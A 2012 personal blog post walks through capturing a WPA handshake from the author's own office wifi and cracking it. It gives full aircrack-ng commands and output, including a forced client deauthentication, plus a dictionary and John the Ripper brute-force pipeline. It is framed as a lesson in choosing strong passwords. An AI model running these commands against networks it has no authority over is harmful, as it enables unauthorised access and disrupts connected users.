The point of this post is to show that 1) you should select reasonably complex passwords (complex from a dictionary/autogeneration POV) and 2) no password is uncrackable, so changing your password on a regular basis is a good idea.
See http://verahill.blogspot.com.au/2012/10/your-neighbours-wep-wifi-and-you.html to get set up with aircrack and kismet.
For this post I used my office wifi and my android phone as the client.
AP: "edunet2", Channel 6, MAC 00:1F:33:30:XX:XX, Client: MAC 00:23:76:B0:XX:XX
Snooping
Kismet is a good tool for this. See here for how to get started with kismet: http://verahill.blogspot.com.au/2012/10/your-neighbours-wep-wifi-and-you.html
Or you could just use your android phone and a decent wireless scanner...
Attacking
First set up your interface and a work directory:
mkdir ~/airscan cd ~/airscan sudo airmon-ng start wlan1
Next, start to collect data:
sudo airodump-ng -c 6 --bssid 00:1F:33:30:XX:XX -w psk wlan1You can now either wait, and wait and wait -- until you manage to capture a handshake (connection between client and AP).CH 6 ][ Elapsed: 2 mins ][ 2012-10-29 11:43 ][ BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:1F:33:30:XX:XX -21 0 1536 711 0 6 54e. WPA TKIP PSK edunet2 BSSID STATION PWR Rate Lost Packets 00:1F:33:30:XX:XX 00:23:76:B0:XX:XX -18 54e-54e 0
Or you can force things a bit if there's a client attached. To force it, de-authenticate the real client and hope that it's been set to auto-reconnect.
sudo aireplay-ng -0 1 -a 00:1F:33:30:XX:XX -c 00:23:76:B0:XX:XX wlan1
You're done when you see "WPA handshake: 00:1F:33:30:XX:XX" in the upper right corner.11:41:03 Waiting for beacon frame (BSSID: 00:1F:33:30:XX:XX) on channel 6 11:41:04 Sending 64 directed DeAuth. STMAC: [00:23:76:B0:XX:XX] [ 0|63 ACKs]
Depending on how far away you are from the AP and the client this may or may not be easy.
Cracking the password exchanged during the handshake is the biggest challenge though.
Cracking for show
In the case you actually already know the password (e.g. you're cracking your own wireless), create a file called password.lst with your password in it. Or get a dictionary file and add your password to it.
Then run
aircrack-ng -w password.lst -b 00:1F:33:30:XX:XX psk*.cap
which gives
Aircrack-ng 1.1 r1901 [00:00:00] 1 keys tested (389.52 k/s) KEY FOUND! [ supersecretpassword ] Master Key : 49 97 0F F9 BE 9E BB DB 9B 92 70 E2 2A 31 D5 1D 29 31 24 17 83 E9 45 63 D3 B0 E1 AE FA 65 DF 7B Transient Key : 37 6A 8D BC D6 2F 13 BD 31 DA B8 F4 21 A7 65 5C A9 39 9A 6B 68 44 D6 12 17 D2 E2 A5 6E 9E 51 19 4D A7 F7 5E 96 EB 41 06 D5 55 8A 53 23 04 66 D1 86 AC CC A1 13 17 CC 1A BF 62 9E 9B 20 6C DC 10 EAPOL HMAC : B3 07 9D 1A 16 A4 E0 EB C2 EE 71 81 D5 CB 56 E8As far as I understand aircrack-ng only support dictionary based attacks for WPA.
Brute-force using John the Ripper (sort of):
Ideally I should use the method shown below this section, but I haven't quite gotten that to work.
Instead I use john to generate the random strings and pipe them to aircrack-ng:
/opt/john/john-1.7.9/run/./john --incremental=Alpha --stdout| aircrack-ng -b 00:1F:33:30:XX:XX -w - psk*.cap
And that kind of works, although awkwardly so -- you can look at john.conf for limits to how the random passwords are generated (i.e. MaxLen, MinLen)
What should've worked follows below -- but it doesn't work for me.
So far not working:
*In theory everything below works, but I'm having no luck cracking the password even if I put it in the dictionary -- which is the points of the whole exercise.
Brute-forcing using John the Ripper:
This requires more brawn than brain, so using e.g. John the Ripper may be a good idea. See here for a suitable set-up for a beowulf cluster: http://verahill.blogspot.com.au/2012/09/compiling-john-ripper-singleserial.html
The only issue is that John the Ripper doesn't handle cap files directly.
Compile and install cap2hccap:
mkdir ~/tmp/cap2hccap cd ~/tmp/cap2hccap wget http://sourceforge.net/projects/cap2hccap/files/cap2hccap.tar.gz tar xvf cap2hccap.tar.gz make
That creates a binary called cap2hccap.bin.
You might get a few warnings, but that's nothing to worry about. You might want to move the binary to e.g. /usr/local/bin
sudo mv cap2hccap.bin /usr/local/bin/
Convert your cap file from before
cap2hccap.bin psk-02.cap psk-02.hccapConvert that file in turn:[info ] writing handshake for "edunet2".
/opt/john/john-1.7.9-jumbo-6/run/hccap2john psk-02.hccap > psk-02.john
And crack
touch john.ini
john --wordlist=password.lst --format=wpapskda psk-02.john
I'm just generally having very little luck with john the ripper to be honest, regardless of what I'm trying to crack -- so far I've only managed to test the password strengths of users on one of my linux boxes.
Errors:
If you get
./hccap2john psk-02.hccap psk-02.johnyou should upgrade to version 1.7.9-jumbo-7 or better.hccap2john: hccap2john.c:75: process_file: Assertion `bytes==392' failed. Aborted
Bug reported here: https://bugs.archlinux.org/task/30516 and here: http://www.openwall.com/lists/john-dev/2012/07/07/3
If you get
john --wordlist=/opt/john/wordlist.lst --format=wpapsk psk-02.johnjust create a file called john.ini in your working directoryfopen: $JOHN/john.ini: No such file or directory
touch john.ini
No comments:
Post a Comment